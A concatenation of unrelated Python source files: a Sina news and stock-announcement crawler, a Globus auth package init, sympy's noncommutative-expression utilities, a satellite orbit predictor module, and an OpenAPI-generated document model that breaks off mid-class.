    # Full stock universe comes from the main stock database.
    event_stock_list = StockEventBase(GLOBAL_HEADER)
    stock_list = event_stock_list.get_all_stock_list()
    # Announcements are written into the natural_language database.
    mysql_header = mysqlHeader('stock', 'stock2020', 'natural_language')
    event = cninfoAnnounce(mysql_header)
    event._set_param()
    for stock in stock_list:
        event.run(stock)
def event_record_sina_news_url():
    """Scrape Sina news index pages and record every article URL found.

    Progress is appended to a local counter file, one line per index page.
    """
    from taurus.news_downloader import SinaNewsSpider
    from polaris.mysql8 import NLP_HEADER
    import time
    import random
    # NLP_HEADER = mysqlHeader('stock', 'stock2020', 'natural_language')
    event = SinaNewsSpider(NLP_HEADER, '')
    # NOTE(review): 49444 looks like a manual resume point (last crawled
    # page number) -- confirm, and consider persisting it instead of
    # editing the source between runs.
    i = 49444
    event.start_url(i)
    for url in event.url_list:
        hrefs = event.extract_href(url)
        for href in hrefs:
            # print(href)
            # Best-effort insert: duplicate/invalid URLs are skipped.
            # NOTE(review): consider logging the exception instead of pass.
            try:
                event.record_url(href)
            except Exception:
                pass
        # Random delay between pages to avoid hammering the server.
        time.sleep(random.randint(5, 10))
        # NOTE(review): hard-coded machine-local path; breaks elsewhere.
        with open('/home/friederich/Documents/spider/count', 'a') as f:
            f.write(f"Page: <{str(i)}> contains {len(hrefs)} urls.\n")
        i += 1
def event_download_news(n):
    """Download up to *n* queued news pages, pausing between fetches.

    :param n: maximum number of URLs (taken from the head of the queue)
        to process in this run.
    """
    from mars.network import delay
    from polaris.mysql8 import mysqlHeader
    from taurus.news_downloader import newsSpider
    header = mysqlHeader('stock', 'stock2020', 'natural_language')
    event = newsSpider(header)
    url_list = event.get_url_list()
    for url in url_list[:n]:
        try:
            event.save_page(url)
            # Throttle: wait between page downloads.
            delay(5)
        except Exception as e:
            # Report the failing URL but keep crawling the rest.
            print(url)
            print(e)
# Manual entry point: run the Sina URL crawler when invoked as a script.
if __name__ == "__main__":
    # event_download_news(15000)
    event_record_sina_news_url()
|
from .client import AuthClient, ConfidentialAppAuthClient, NativeAppAuthClient
from .errors import AuthAPIError
from .flow_managers import (
GlobusAuthorizationCodeFlowManager,
GlobusNativeAppFlowManager,
)
from .identity_map import IdentityMap
from .response import OAuthDependentTokenResponse, OAuthTokenResponse
# Public re-exports of the auth subpackage, grouped by theme
# (clients/errors, identity utilities, flow managers, token responses)
# rather than alphabetically.
__all__ = [
    "AuthClient",
    "AuthAPIError",
    "NativeAppAuthClient",
    "ConfidentialAppAuthClient",
    "IdentityMap",
    "GlobusNativeAppFlowManager",
    "GlobusAuthorizationCodeFlowManager",
    "OAuthDependentTokenResponse",
    "OAuthTokenResponse",
]
|
# sympy/galgebra/ncutil.py
"""
ncutil.py contains all the needed utility functions that only depend on
SymPy and that are required for the expansion and manipulation of linear
combinations of noncommutative SymPy symbols.
also contains "half_angle_reduce" which is probably not needed any more
due to the improvements in trigsimp.
"""
from sympy import expand, Mul, Add, Symbol, S, Pow, diff, trigsimp, \
simplify, sin, cos, symbols
# numpy is optional: it is only required by numpy_matrix() below.
try:
    from numpy import matrix
    numpy_loaded = True
except ImportError:
    numpy_loaded = False

# Noncommutative stand-in for the scalar 1: used to tag the scalar part of
# a multivector so it survives args_cnc() splitting like any other base.
ONE_NC = Symbol('ONE', commutative=False)
def get_commutative_coef(expr):
    """Return the product of the commutative factors of *expr*.

    For a ``Mul`` this is the commutative part reported by ``args_cnc()``;
    any other expression is treated as having coefficient one.
    """
    if not isinstance(expr, Mul):
        return S.One
    commutative_factors, _ = expr.args_cnc()
    return Mul(*commutative_factors)
def half_angle_reduce(expr, theta):
    """Rewrite half-angle sin/cos products in *expr* as full-angle forms.

    sin(theta/2) and cos(theta/2) are abstracted to temporary symbols,
    their quadratic combinations replaced via the standard half-angle
    identities, and the result simplified with trigsimp.
    """
    half_sin, half_cos = symbols('s c')
    abstracted = expr.subs({sin(theta / 2): half_sin, cos(theta / 2): half_cos})
    identities = {
        half_sin * half_cos: sin(theta) / 2,
        half_sin**2: (1 - cos(theta)) / 2,
        half_cos**2: (1 + cos(theta)) / 2,
    }
    return trigsimp(simplify(abstracted.subs(identities)), recursive=True)
def linear_expand(expr):
    """Split *expr* into commutative coefficients and noncommutative bases.

    For ``expr = expr_0 + expr_1*a_1 + ... + expr_n*a_n`` (each ``a_j`` a
    noncommuting basis symbol) return the tuple pair
    ``((expr_0, ..., expr_n), (1, a_1, ..., a_n))``.  Each term may be any
    ``Mul`` containing ``a_j`` as a factor; ``a_j`` need not be the last
    factor.  ``expr_0`` is the scalar part.
    """
    expr = expand(expr)
    if expr.is_commutative:  # purely scalar: only expr_0 present
        return (expr, ), (S.One, )
    if isinstance(expr, Mul):  # a single product term
        commutative, noncommutative = expr.args_cnc()
        coefs = Mul(*commutative)
        bases = noncommutative[0]
    elif isinstance(expr, Symbol):  # a bare noncommutative symbol
        coefs = S.One
        bases = expr
    elif isinstance(expr, Add):  # several additive terms
        coefs = []
        bases = []
        for term in expr.args:
            commutative, noncommutative = term.args_cnc()
            coef = Mul(*commutative)
            base = noncommutative[0]
            if base in bases:  # accumulate onto an existing base
                coefs[bases.index(base)] += coef
            else:  # first occurrence of this base
                coefs.append(coef)
                bases.append(base)
    else:
        raise NotImplementedError("linear_expand for type %s" % type(expr))
    # Normalize the single-term cases to lists before freezing to tuples.
    if not isinstance(coefs, list):
        coefs = [coefs]
    if not isinstance(bases, list):
        bases = [bases]
    return tuple(coefs), tuple(bases)
def linear_projection(expr, plist=None):
    """
    If a sympy 'Expr' is of the form:
    expr = expr_0 + expr_1*a_1 + ... + expr_n*a_n
    where all the a_j are noncommuting symbols in basis then
    proj(expr) returns the sum of those terms where a_j is in plist.
    With plist=None only the scalar part expr_0 is kept.
    """
    if expr.is_commutative and plist is None:  # return scalar projection
        return expr
    expr = expand(expr)
    if isinstance(expr, Mul):  # expr has single term
        # NOTE(review): if plist is None here (noncommutative Mul, no
        # projection list) the membership test below raises TypeError --
        # callers appear to always pass plist for noncommutative input;
        # confirm.
        (coefs, bases) = expr.args_cnc()
        if bases[0] in plist:  # vector term to be projected
            return Mul(*coefs) * bases[0]
        else:
            return S.Zero
    elif isinstance(expr, Symbol):  # base vector to be projected
        if expr in plist:
            return expr
        else:
            return S.Zero
    elif isinstance(expr, Add):  # expr has multiple terms
        result = S.Zero
        for arg in expr.args:
            term = arg.args_cnc()
            if term[1] == [] and plist is None:  # scalar term to be projected
                result += Mul(*term[0])
            elif term[1] != [] and plist is not None and term[1][0] in plist:  # vector term to be projected
                result += Mul(*term[0]) * term[1][0]
        return result
def non_scalar_projection(expr):
    """
    If a sympy 'Expr' is of the form:
    expr = expr_0*S.One + expr_1*a_1 + ... + expr_n*a_n
    where all the a_j are noncommuting symbols in basis then the sum of
    those terms whose base is not ONE_NC (everything except the scalar
    part) is returned.
    """
    if expr.is_commutative:  # purely scalar: nothing non-scalar to return
        return S.Zero
    expr = expand(expr)
    if isinstance(expr, Mul):  # expr has single term
        (coefs, bases) = expr.args_cnc()
        if bases[0] != ONE_NC:  # vector term to be projected
            return Mul(*coefs) * bases[0]
        else:
            return S.Zero
    elif isinstance(expr, Symbol):  # base vector to be projected
        if expr != ONE_NC:
            return expr
        else:
            return S.Zero
    elif isinstance(expr, Add):  # expr has multiple terms
        result = S.Zero
        for arg in expr.args:
            term = arg.args_cnc()
            # BUG FIX: previously this compared the whole noncommutative
            # factor *list* against ONE_NC (``term[1] != ONE_NC``), which is
            # always True, so ONE_NC terms were never filtered out and purely
            # commutative terms crashed with IndexError on term[1][0].
            if term[1] and term[1][0] != ONE_NC:
                result += Mul(*term[0]) * term[1][0]
        return result
def nc_substitue(expr, sub_dict):
    """Map each noncommutative base of *expr* through *sub_dict*.

    *expr* is split with linear_expand(); every base except the scalar
    base 1 is replaced by ``sub_dict[base]`` and recombined with its
    commutative coefficient.  The scalar part is dropped.
    """
    coefs, bases = linear_expand(expr)
    return sum(
        (coef * sub_dict[base] for coef, base in zip(coefs, bases) if base != 1),
        S.Zero,
    )
def linear_function(expr, fct):
    """Apply *fct* to every noncommutative base of *expr*.

    For ``expr = expr_0 + expr_1*a_1 + ... + expr_n*a_n`` return
    ``expr_0 + expr_1*fct(a_1) + ... + expr_n*fct(a_n)``; the commutative
    coefficients are left untouched.
    """
    if expr.is_commutative:  # scalar part passes through unchanged
        return expr
    expr = expand(expr)
    if isinstance(expr, Mul):  # a single product term
        commutative, noncommutative = expr.args_cnc()
        return Mul(*commutative) * fct(noncommutative[0])
    if isinstance(expr, Symbol):  # a bare base symbol
        return fct(expr)
    if isinstance(expr, Add):  # several additive terms
        total = S.Zero
        for term in expr.args:
            commutative, noncommutative = term.args_cnc()
            coef = Mul(*commutative)
            if not noncommutative:  # scalar term
                total += coef
            else:
                total += coef * fct(noncommutative[0])
        return total
def coef_function(expr, fct):
    """
    If a sympy 'Expr' is of the form:
    expr = expr_0 + expr_1*a_1 + ... + expr_n*a_n
    where all the a_j are noncommuting symbols in basis then
    f(expr) = fct(expr_0) + fct(expr_1)*a_1 + ... + fct(expr_n)*a_n
    is returned -- *fct* acts on the commutative coefficients only.
    """
    expr = expand(expr)
    if isinstance(expr, Mul):  # a single product term
        (coefs, bases) = expr.args_cnc()
        return fct(Mul(*coefs)) * bases[0]
    elif isinstance(expr, Symbol):
        if expr.is_commutative:  # a scalar: fct applies to it
            return fct(expr)
        else:  # a bare base: coefficient is 1, base unchanged
            return expr
    elif isinstance(expr, Add):  # several additive terms
        result = S.Zero
        for arg in expr.args:
            term = arg.args_cnc()
            if term[1] == []:  # scalar term
                result += fct(Mul(*term[0]))
            else:
                # BUG FIX: fct was previously applied to the noncommutative
                # base as well (``fct(term[1][0])``), contradicting both the
                # docstring and the single-term Mul branch above, which apply
                # fct to the commutative coefficient only.
                result += fct(Mul(*term[0])) * term[1][0]
        return result
def bilinear_product(expr, fct):
    """Apply the bilinear map *fct* to the base pair of each term.

    For a term ``expr_ij*a_i*a_j`` (bases noncommuting, coefficients
    commuting) return ``expr_ij*fct(a_i, a_j)``; a pure scalar or a
    single-base term ``expr_i*a_i`` is returned unchanged.  ``a_i**2``
    is treated as ``fct(a_i, a_i)``.
    """
    def _term_product(term):
        # Handle one additive term of the expanded expression.
        if term.is_zero:
            return term
        if isinstance(term, Mul):  # coefficient times base factors
            commutative, noncommutative = term.args_cnc()
            coef = Mul(*tuple(commutative))
            first = noncommutative[0]
            if isinstance(first, Pow):  # coef * a_i**2
                base = first.args[0]
                return coef * fct(base, base)
            if len(noncommutative) == 1:  # coef * a_i: leave as is
                return term
            return coef * fct(noncommutative[0], noncommutative[1])
        if isinstance(term, Pow):  # bare a_i**2
            base = term.args[0]
            return fct(base, base)
        if isinstance(term, Symbol):  # bare a_i
            return term
        raise TypeError('!!!!Cannot compute bilinear_product for ' + str(term) + '!!!!\n')

    expr = expand(expand(expr))
    if not isinstance(expr, Add):
        return _term_product(expr)
    result = S.Zero
    for term in expr.args:
        result += _term_product(term)
    return result
def multilinear_product(expr, fct):
    """
    If a sympy 'Expr' is of the form:
    expr = expr_i1i2...irj*a_i1*a_i2*...*a_ir or expr_0
    where all the a_i are noncommuting symbols in basis and the expr's
    are commuting expressions then
    multilinear_product(expr) = expr_i1i2...ir*fct(a_i1, a_i2, ..., a_ir)
    multilinear_product(expr_0) = expr_0
    where fct() is defined for r <= n the total number of bases
    """
    if expr.is_commutative:  # no bases in expr
        return expr
    if isinstance(expr, Mul):  # bases in expr
        (coefs, bases) = expr.args_cnc()
        if len(coefs) == 0:  # expr_ij = 1
            coefs = [S.One]
        coef = Mul(*tuple(coefs))
        new_bases = []
        # Flatten powers: a_i**r contributes r copies of a_i to the
        # argument list handed to fct.
        for base in bases:
            if isinstance(base, Pow):
                args = base.args
                new_bases += args[1] * [args[0]]
            else:
                new_bases.append(base)
        return coef * fct(new_bases)
    # NOTE(review): a noncommutative expr that is not a Mul (a bare Symbol
    # or Pow) falls through and returns None implicitly -- confirm whether
    # such inputs can reach this function from its callers.
def bilinear_function(expr, fct):
    """Apply bilinear_product() term by term over an additive expression.

    Scalars pass through unchanged; a single Mul/Pow/Symbol term is handed
    straight to bilinear_product(); an Add is processed term by term and
    the results summed.
    """
    if expr.is_commutative:
        return expr
    expr = expand(expr)
    if isinstance(expr, Add):  # several additive terms
        total = S.Zero
        for term in expr.args:
            total += bilinear_product(term, fct)
        return total
    if isinstance(expr, (Mul, Pow, Symbol)):  # a single term
        return bilinear_product(expr, fct)
def multilinear_function(expr, fct):
    """
    If a sympy 'Expr' is of the form (summation convention):
    expr = expr_0 + Sum{0 < r <= n}{expr_i1i2...ir*a_i1*a_i2*...*a_ir}
    where all the a_j are noncommuting symbols in basis and the
    dimension of the basis is n then
    multilinear_function(expr) = multilinear_product(expr_0)
    + Sum{0<r<=n}multilinear_product(expr_i1i2...ir*a_i1*a_i2*...*a_ir)
    """
    if expr.is_commutative:
        return expr
    expr = expand(expr)
    # NOTE(review): despite the docstring, both branches below delegate to
    # bilinear_product, which only uses the first two noncommutative factors
    # of each term (higher-order products are silently truncated).  Switching
    # to multilinear_product is not a drop-in fix because that function does
    # not handle bare Symbol/Pow terms -- confirm the intended behavior.
    if isinstance(expr, (Mul, Pow, Symbol)):  # only one additive term
        return bilinear_product(expr, fct)
    elif isinstance(expr, Add):  # multiple additive terms
        result = S.Zero
        for arg in expr.args:
            result += bilinear_product(arg, fct)
        return result
def linear_derivation(expr, fct, x):
    """
    If a sympy 'Expr' is of the form:
    expr = expr_0 + expr_1*a_1 + ... + expr_n*a_n
    where all the a_j are noncommuting symbols in basis then
    linear_derivation(expr) = diff(expr_0, x) + diff(expr_1, x)*a_1 + ...
        + diff(expr_n, x)*a_n + expr_1*fct(a_1, x) + ...
        + expr_n*fct(a_n, x)
    (product rule with *fct* supplying the derivative of each base).
    """
    if expr.is_commutative:  # purely scalar: ordinary derivative
        return diff(expr, x)
    expr = expand(expr)
    if isinstance(expr, Mul):  # a single product term
        # BUG FIX: this previously read
        # ``x = (coefs, bases) = expr.args_cnc()``, rebinding the
        # differentiation variable x to the args_cnc() tuple before it was
        # passed to diff() and fct().
        (coefs, bases) = expr.args_cnc()
        coef = Mul(*coefs)
        return diff(coef, x) * bases[0] + coef * fct(bases[0], x)
    elif isinstance(expr, Symbol):  # a bare base symbol
        return fct(expr, x)
    elif isinstance(expr, Add):  # several additive terms
        result = S.Zero
        for arg in expr.args:
            term = arg.args_cnc()
            coef = Mul(*term[0])
            if term[1] == []:  # scalar term
                result += diff(coef, x)
            else:  # coefficient derivative plus base derivative
                result += diff(coef, x) * term[1][0] + coef * fct(term[1][0], x)
        return result
def product_derivation(F, fct, x):
    """Product-rule derivative of one noncommutative product term.

    For ``F = expr_0*a_1*...*a_n`` return
    ``diff(expr_0, x)*a_1*...*a_n`` plus, for each i, the term with
    ``a_i`` replaced by ``fct(a_i, x)`` (the supplied base derivative).
    """
    if F.is_commutative:  # purely scalar: ordinary derivative
        return diff(F, x)
    if isinstance(F, Mul):
        commutative, bases = F.args_cnc()
        coef = Mul(*commutative)
        dcoef = diff(coef, x)
        if len(bases) == 1:  # single base: two-term product rule
            return dcoef * bases[0] + coef * fct(bases[0], x)
        total = dcoef * Mul(*bases)
        # Differentiate one base factor at a time, keeping factor order.
        for position, base in enumerate(bases):
            total += coef * Mul(*bases[:position]) * fct(base, x) * Mul(*bases[position + 1:])
        return total
    if isinstance(F, Symbol):  # a bare base symbol
        return fct(F, x)
def multilinear_derivation(F, fct, x):
    """Derivative of a general multivector expression with respect to x.

    Scalars are differentiated directly; a single product term goes
    through product_derivation(); an Add is differentiated term by term
    and the results summed.
    """
    if F.is_commutative:
        return diff(F, x)
    if isinstance(F, (Mul, Symbol)):
        return product_derivation(F, fct, x)
    if isinstance(F, Add):
        total = S.Zero
        for term in F.args:
            total += product_derivation(term, fct, x)
        return total
def numpy_matrix(M):
    """Convert a SymPy matrix *M* with numeric entries to a numpy.matrix.

    Raises ImportError when numpy is unavailable and TypeError when any
    entry cannot be converted to a Python float.
    """
    if not numpy_loaded:
        raise ImportError('Cannot use "numpy_matrix" since "numpy" is not loaded')
    rows = M.tolist()
    for row in rows:
        for col, entry in enumerate(row):
            try:
                row[col] = float(entry)
            except ValueError:
                raise TypeError('In Matrix:\n%s\nCannot convert %s to python float.' % (M, entry))
    return matrix(rows)
|
# MIT License
#
# Copyright (c) 2017 Satellogic SA
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import datetime as dt
import logging
import warnings
from collections import namedtuple
from math import pi, degrees
import numpy as np
try:
from scipy.optimize import brentq, minimize_scalar
except ImportError:
warnings.warn('scipy module was not found, some features may not work properly.',
ImportWarning)
from orbit_predictor.constants import MU_E
from orbit_predictor.exceptions import NotReachable
from orbit_predictor import coordinate_systems
from orbit_predictor.keplerian import rv2coe
from orbit_predictor.utils import (
angle_between,
reify,
vector_norm,
gstime_from_datetime,
get_shadow,
get_sun,
eclipse_duration,
get_satellite_minus_penumbra_verticals,
)
from .pass_iterators import ( # noqa: F401
LocationPredictor,
PredictedPass,
)
logger = logging.getLogger(__name__)
ONE_SECOND = dt.timedelta(seconds=1)
def round_datetime(dt_):
    """Identity hook for datetime rounding; returns *dt_* unchanged."""
    return dt_
class Position(namedtuple(
        "Position", ['when_utc', 'position_ecef', 'velocity_ecef', 'error_estimate'])):
    """Satellite state vector at a UTC datetime, in ECEF coordinates.

    Fields: when_utc (datetime), position_ecef, velocity_ecef, and an
    optional error_estimate (None when not available).
    """

    @reify
    def position_llh(self):
        """Latitude (deg), longitude (deg), altitude (km)."""
        return coordinate_systems.ecef_to_llh(self.position_ecef)

    @reify
    def osculating_elements(self):
        """Osculating Keplerian orbital elements.

        Semimajor axis (km), eccentricity, inclination (deg),
        right ascension of the ascending node or RAAN (deg),
        argument of perigee (deg), true anomaly (deg).
        """
        # ECEF -> ECI rotation uses Greenwich sidereal time at the epoch.
        gmst = gstime_from_datetime(self.when_utc)
        position_eci = coordinate_systems.ecef_to_eci(self.position_ecef, gmst)
        velocity_eci = coordinate_systems.ecef_to_eci(self.velocity_ecef, gmst)
        # Convert position to Keplerian osculating elements
        p, ecc, inc, raan, argp, ta = rv2coe(
            MU_E, np.array(position_eci), np.array(velocity_eci)
        )
        # Transform to more familiar semimajor axis (p is the semi-latus rectum)
        sma = p / (1 - ecc ** 2)
        # NOTE: rv2coe already does % (2 * np.pi)
        # but under some circumstances this might require another pass,
        # see https://github.com/satellogic/orbit-predictor/pull/106#issuecomment-730177598
        return sma, ecc, degrees(inc), degrees(raan), degrees(argp), degrees(ta) % 360
class Predictor:
    """Abstract base for satellite predictors.

    Subclasses must provide ``sate_id``, ``propagate_eci`` and
    ``get_position``; the illumination/geometry helpers below are built on
    top of those.
    """

    @property
    def sate_id(self):
        # Identifier of the satellite; must be supplied by subclasses.
        raise NotImplementedError

    def propagate_eci(self, when_utc=None):
        # Return (position, velocity) in ECI at when_utc; abstract.
        raise NotImplementedError

    def get_position(self, when_utc=None):
        # Return a Position (ECEF) at when_utc; abstract.
        raise NotImplementedError("You have to implement it!")

    def get_shadow(self, when_utc=None):
        """Gives illumination at given time (2 for illuminated, 1 for penumbra, 0 for umbra)."""
        if when_utc is None:
            when_utc = dt.datetime.utcnow()
        return get_shadow(
            self.get_position(when_utc).position_ecef,
            when_utc
        )

    def get_normal_vector(self, when_utc=None):
        """Gets unitary normal vector (orthogonal to orbital plane) at given time."""
        if when_utc is None:
            when_utc = dt.datetime.utcnow()
        position, velocity = self.propagate_eci(when_utc)
        # r x v is normal to the orbital plane; scale to unit length.
        orbital_plane_normal = np.cross(position, velocity)
        return orbital_plane_normal / vector_norm(orbital_plane_normal)

    def get_beta(self, when_utc=None):
        """Gets angle between orbital plane and Sun direction (beta) at given time, in degrees."""
        if when_utc is None:
            when_utc = dt.datetime.utcnow()
        # Here we calculate the complementary angle of beta,
        # because we use the normal vector of the orbital plane
        beta_comp = angle_between(
            get_sun(when_utc),
            self.get_normal_vector(when_utc)
        )
        # We subtract from 90 degrees to return the real beta angle
        return 90 - beta_comp
class CartesianPredictor(Predictor):
    """Predictor whose subclasses propagate Cartesian ECI state vectors.

    Adds ECEF conversion, orbital-period helpers, ground-station pass
    search and eclipse-interval search on top of ``propagate_eci``.
    """

    def _propagate_ecef(self, when_utc=None):
        """Return position and velocity in the given date using ECEF coordinate system."""
        if when_utc is None:
            when_utc = dt.datetime.utcnow()
        position_eci, velocity_eci = self.propagate_eci(when_utc)
        # ECI -> ECEF rotation uses Greenwich sidereal time at the epoch.
        gmst = gstime_from_datetime(when_utc)
        position_ecef = coordinate_systems.eci_to_ecef(position_eci, gmst)
        velocity_ecef = coordinate_systems.eci_to_ecef(velocity_eci, gmst)
        return position_ecef, velocity_ecef

    @reify
    def mean_motion(self):
        """Mean motion, in radians per minute"""
        # Abstract: subclasses derive this from their orbital data.
        raise NotImplementedError

    @reify
    def period(self):
        """Orbital period, in minutes"""
        return 2 * pi / self.mean_motion

    def get_position(self, when_utc=None):
        """Return a Position namedtuple in ECEF coordinate system"""
        if when_utc is None:
            when_utc = dt.datetime.utcnow()
        position_ecef, velocity_ecef = self._propagate_ecef(when_utc)
        return Position(when_utc=when_utc, position_ecef=position_ecef,
                        velocity_ecef=velocity_ecef, error_estimate=None)

    def get_only_position(self, when_utc=None):
        """Return a tuple in ECEF coordinate system"""
        return self.get_position(when_utc).position_ecef

    def get_eclipse_duration(self, when_utc=None, tolerance=1e-1):
        """Gets eclipse duration at given time, in minutes"""
        # The analytic eclipse_duration() formula assumes a circular orbit,
        # so reject orbits whose eccentricity exceeds the tolerance.
        ecc = self.get_position(when_utc).osculating_elements[1]
        if ecc > tolerance:
            raise NotImplementedError("Non circular orbits are not supported")
        beta = self.get_beta(when_utc)
        return eclipse_duration(beta, self.period)

    def passes_over(self, location, when_utc, limit_date=None, max_elevation_gt=0, aos_at_dg=0,
                    location_predictor_class=LocationPredictor, tolerance_s=1.0):
        # Returns an iterator of PredictedPass objects over ``location``.
        return location_predictor_class(location, self, when_utc, limit_date,
                                        max_elevation_gt, aos_at_dg, tolerance_s=tolerance_s)

    def get_next_pass(self, location, when_utc=None, max_elevation_gt=5,
                      aos_at_dg=0, limit_date=None,
                      location_predictor_class=LocationPredictor, tolerance_s=1.0):
        """Return a PredictedPass instance with the data of the next pass over the given location

        location_llh: point on Earth we want to see from the satellite.
        when_utc: datetime UTC after which the pass is calculated, default to now.
        max_elevation_gt: filter passes with max_elevation under it.
        aos_at_dg: This is if we want to start the pass at a specific elevation.

        The next pass with a LOS strictly after when_utc will be returned,
        possibly the current pass.
        """
        if when_utc is None:
            when_utc = dt.datetime.utcnow()
        # Take the first pass the iterator yields; if it is exhausted the
        # propagation limit was reached without finding one.
        for pass_ in self.passes_over(location, when_utc, limit_date,
                                      max_elevation_gt=max_elevation_gt,
                                      aos_at_dg=aos_at_dg,
                                      location_predictor_class=location_predictor_class,
                                      tolerance_s=tolerance_s):
            return pass_
        else:
            raise NotReachable('Propagation limit date exceeded')

    def eclipses_since(self, when_utc=None, limit_date=None):
        """
        An iterator that yields all eclipses start and end times between
        when_utc and limit_date.

        The next eclipse with a end strictly after when_utc will be returned,
        possibly the current eclipse.
        The last eclipse returned starts before limit_date, but it can end
        strictly after limit_date.
        No circular orbits are not supported, and will raise NotImplementedError.
        """
        def _get_illumination(t):
            # Signed vertical distance of the satellite above the penumbra
            # cone, t seconds after ``start``; negative means eclipsed.
            my_start = start + dt.timedelta(seconds=t)
            result = get_satellite_minus_penumbra_verticals(
                self.get_only_position(my_start),
                my_start
            )
            return result

        if when_utc is None:
            when_utc = dt.datetime.utcnow()

        orbital_period_s = self.period * 60
        # A third of the orbit period is used as the base window of the search.
        # This window ensures the function get_satellite_minus_penumbra_verticals
        # will not have more than one local minimum (one in the illuminated phase and
        # the other in penumbra).
        base_search_window_s = orbital_period_s / 3
        start = when_utc

        while limit_date is None or start < limit_date:
            # a minimum negative value is aproximatelly the middle point of the eclipse
            minimum_illumination = minimize_scalar(
                _get_illumination,
                bounds=(0, base_search_window_s),
                method="bounded",
                options={"xatol": 1e-2},
            )
            eclipse_center_candidate_delta_s = minimum_illumination.x

            # If found a minimum that is not illuminated, there is an eclipse here
            if _get_illumination(eclipse_center_candidate_delta_s) < 0:
                # Search now both zeros to get the start and end of the eclipse
                # We know that in (0, base_search_window_s) there is a minimum with negative value,
                # and also on the opposite side of the eclipse we expect sunlight,
                # therefore we already have two robust bracketing intervals
                eclipse_start_delta_s = brentq(
                    _get_illumination,
                    eclipse_center_candidate_delta_s - orbital_period_s / 2,
                    eclipse_center_candidate_delta_s,
                    xtol=1e-2,
                    full_output=False,
                )
                eclipse_end_delta_s = brentq(
                    _get_illumination,
                    eclipse_center_candidate_delta_s,
                    eclipse_center_candidate_delta_s + orbital_period_s / 2,
                    xtol=1e-2,
                    full_output=False,
                )
                eclipse_start = start + dt.timedelta(seconds=eclipse_start_delta_s)
                eclipse_end = start + dt.timedelta(seconds=eclipse_end_delta_s)
                yield eclipse_start, eclipse_end
                # Resume the search safely past the eclipse just found.
                start = eclipse_end + dt.timedelta(seconds=base_search_window_s)
            else:
                start += dt.timedelta(seconds=base_search_window_s)
class GPSPredictor(Predictor):
    """Marker subclass for GPS-based predictors; no specialization yet."""
    pass
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from harpocrates_server.models.base_model_ import Model
from harpocrates_server.models.predicted_classification import PredictedClassification
from harpocrates_server.models.text_content import TextContent
from harpocrates_server import util
from harpocrates_server.models.predicted_classification import PredictedClassification # noqa: E501
from harpocrates_server.models.text_content import TextContent # noqa: E501
class Document(Model):
    """NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).

    Do not edit the class manually.
    """

    def __init__(self, name=None, document_id=None, text_split_granularity=None, predicted_classification=None, text_contents=None):  # noqa: E501
        """Document - a model defined in OpenAPI

        :param name: The name of this Document.  # noqa: E501
        :type name: str
        :param document_id: The document_id of this Document.  # noqa: E501
        :type document_id: str
        :param text_split_granularity: The text_split_granularity of this Document.  # noqa: E501
        :type text_split_granularity: str
        :param predicted_classification: The predicted_classification of this Document.  # noqa: E501
        :type predicted_classification: PredictedClassification
        :param text_contents: The text_contents of this Document.  # noqa: E501
        :type text_contents: List[TextContent]
        """
        # Declared OpenAPI type of each attribute, used by the generated
        # (de)serialization helpers in ``util``.
        self.openapi_types = {
            'name': str,
            'document_id': str,
            'text_split_granularity': str,
            'predicted_classification': PredictedClassification,
            'text_contents': List[TextContent]
        }

        # Python attribute name -> JSON key in API payloads.
        self.attribute_map = {
            'name': 'name',
            'document_id': 'documentId',
            'text_split_granularity': 'textSplitGranularity',
            'predicted_classification': 'predictedClassification',
            'text_contents': 'textContents'
        }

        # NOTE(review): direct ``_attr`` assignment bypasses the property
        # setters, so the None-checks and allowed-values validation below are
        # not applied at construction time (standard generator behavior).
        self._name = name
        self._document_id = document_id
        self._text_split_granularity = text_split_granularity
        self._predicted_classification = predicted_classification
        self._text_contents = text_contents

    @classmethod
    def from_dict(cls, dikt) -> 'Document':
        """Returns the dict as a model

        :param dikt: A dict.
        :type: dict
        :return: The document of this Document.  # noqa: E501
        :rtype: Document
        """
        return util.deserialize_model(dikt, cls)

    @property
    def name(self):
        """Gets the name of this Document.

        :return: The name of this Document.
        :rtype: str
        """
        return self._name

    @name.setter
    def name(self, name):
        """Sets the name of this Document.

        :param name: The name of this Document.
        :type name: str
        """
        self._name = name

    @property
    def document_id(self):
        """Gets the document_id of this Document.

        :return: The document_id of this Document.
        :rtype: str
        """
        return self._document_id

    @document_id.setter
    def document_id(self, document_id):
        """Sets the document_id of this Document.

        :param document_id: The document_id of this Document.
        :type document_id: str
        """
        # Required field in the API spec: reject explicit None.
        if document_id is None:
            raise ValueError("Invalid value for `document_id`, must not be `None`")  # noqa: E501

        self._document_id = document_id

    @property
    def text_split_granularity(self):
        """Gets the text_split_granularity of this Document.

        Granularity of the split of the document's content  # noqa: E501

        :return: The text_split_granularity of this Document.
        :rtype: str
        """
        return self._text_split_granularity

    @text_split_granularity.setter
    def text_split_granularity(self, text_split_granularity):
        """Sets the text_split_granularity of this Document.

        Granularity of the split of the document's content  # noqa: E501

        :param text_split_granularity: The text_split_granularity of this Document.
        :type text_split_granularity: str
        """
        # Enum constraint from the API spec.
        allowed_values = ["document", "paragraph", "line"]  # noqa: E501
        if text_split_granularity not in allowed_values:
            raise ValueError(
                "Invalid value for `text_split_granularity` ({0}), must be one of {1}"
                .format(text_split_granularity, allowed_values)
            )

        self._text_split_granularity = text_split_granularity

    @property
    def predicted_classification(self):
        """Gets the predicted_classification of this Document.

        :return: The predicted_classification of this Document.
        :rtype: PredictedClassification
        """
        return self._predicted_classification

    @predicted_classification.setter
